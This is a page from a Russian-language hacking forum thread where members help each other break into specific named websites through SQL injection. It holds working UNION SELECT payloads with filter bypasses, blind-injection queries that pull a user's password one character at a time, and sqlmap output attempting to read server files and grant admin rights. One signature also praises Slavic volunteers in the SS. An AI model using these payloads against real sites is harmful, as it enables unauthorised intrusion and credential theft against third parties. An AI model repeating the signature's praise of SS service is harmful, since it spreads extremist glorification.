HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #41  
Старый 12.05.2015, 01:19
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Цитата:
Сообщение от sunnyfruit  
sunnyfruit said:

Создал на Денвере таблицу users где есть id и username
Пишет ошибку:
Сам запрос:
Где почитать можно подробнее?
Mysql символ " не совсем хорошо понимает!
Не " , а ' .
 
Ответить с цитированием

  #42  
Старый 12.05.2015, 08:19
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Код:
Code:
http://www.freelin-wade.com/search.php?cmd=search&words=kkk%27
помогите раскрутить
 
Ответить с цитированием

  #43  
Старый 12.05.2015, 09:10
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:

Код:
Code:
http://www.freelin-wade.com/search.php?cmd=search&words=kkk%27
помогите раскрутить
боюсь, не выйдет. и запроса все вырезается и экранируется. можно бы было попробовать, если бы можно было внедриться в 2 поля
 
Ответить с цитированием

  #44  
Старый 12.05.2015, 13:35
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Не знаю как обойти фильторочек

Код:
Code:
http://psf.com.ua/modules.php?name=news&option=3&news_id=113+order+by+4+--+


Illegal Operation
 
Ответить с цитированием

  #45  
Старый 12.05.2015, 13:46
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Цитата:
Сообщение от Unknowhacker  
Unknowhacker said:

Не знаю как обойти фильторочек
Код:
Code:
http://psf.com.ua/modules.php?name=news&option=3&news_id=113+order+by+4+--+

Illegal Operation
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//psf.com.ua/modules.php?name=news&option=3&news_id=-113+%0AUnion%0ASelect+1,2,3,4+--+
[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//psf.com.ua/modules.php?name=news&option=3&news_id=-113+%0AUnion%0ASelect+1,table_name,3,4+from+information_schema.tables+--+[/COLOR][/COLOR] 
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием

  #46  
Старый 12.05.2015, 21:46
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Почему при ручной эксплуатации blind sql, запросы:

Код:
Code:
or+substring((select+password+from+user+where+id=1+limit+0,1),9,1)=0x64+--+
or+substring((select+password+from+user+where+id=1+limit+0,1),9,1)=0x44+--+
Будут одинаково TRUE? PS 0x64='d' 0x44='D'

Как в таком случае определить в каком регистре буква в пароле?
 
Ответить с цитированием

  #47  
Старый 12.05.2015, 21:53
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:

Почему при ручной эксплуатации blind sql, запросы:
Код:
Code:
or+substring((select+password+from+user+where+id=1+limit+0,1),9,1)=0x64+--+
or+substring((select+password+from+user+where+id=1+limit+0,1),9,1)=0x44+--+
Будут одинаково TRUE? PS 0x64='d' 0x44='D'
Как в таком случае определить в каком регистре буква в пароле?
используйте ascii()
 
Ответить с цитированием

  #48  
Старый 12.05.2015, 23:32
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Цитата:
Сообщение от faza02  
faza02 said:

используйте ascii()
Можно ли как нибудь проверить полученный результат с помощью этойфункции, или же он работает только с одним символом? пример:

нужно проверить итоговую сумму в выражении, чтоб не ошибиться с регистром

Код:
Code:
ascii(substring((select+password+from+users+where+id=1+limit+0,1),8,2))=0x4453+--+
 
Ответить с цитированием

  #49  
Старый 12.05.2015, 23:45
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:

Можно ли как нибудь проверить полученный результат с помощью этойфункции, или же он работает только с одним символом? пример:
нужно проверить итоговую сумму в выражении, чтоб не ошибиться с регистром
Код:
Code:
ascii(substring((select+password+from+users+where+id=1+limit+0,1),8,2))=0x4453+--+
ascii() переводит только 1 символ, смотрите в документации
 
Ответить с цитированием

  #50  
Старый 13.05.2015, 03:50
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

Имеется сайт с sql-injections, но возникли впоросы с sqlmap

Код:
Code:
[Linux Debian] [Apache 2.4.10] [MySQL 5.0] ['10.0.16-MariaDB-1']
Privilege: USAGE
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace
Payload: http://site.com/news.html?id=(SELECT 1582 FROM(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(1582=1582,1))),0x71706b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&cat=main
Не работает --file-read="/home/www/wwuser/user/www/index.php" (или тот же .htaccess, js не важно)

Выдает пустой файл:

.SpoilerTarget" type="button">Spoiler: Результат

Код:
Code:
[WARNING] reflective value(s) found and filtering out
[INFO] retrieved:
[WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
files saved to [1]:[*] C:\sqlmap\output\site.com\files\_home_www_wwuser_user_www_index.php (size differs from remote file)
И тот же вопрос по --sql-query="UPDATE users SET admin=1 WHERE login=test" (как только не пробовал)

.SpoilerTarget" type="button">Spoiler: Результат

Код:
Code:
[WARNING] execution of custom SQL queries is only available when stacked queries are supported
UPDATE UPDATE users SET admin=1 WHERE login=test:        None
[INFO] fetched data logged to text files under 'C:\sqlmap\output\site.com\'
Это из-за нехватки прав? Или что то другое мешает?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ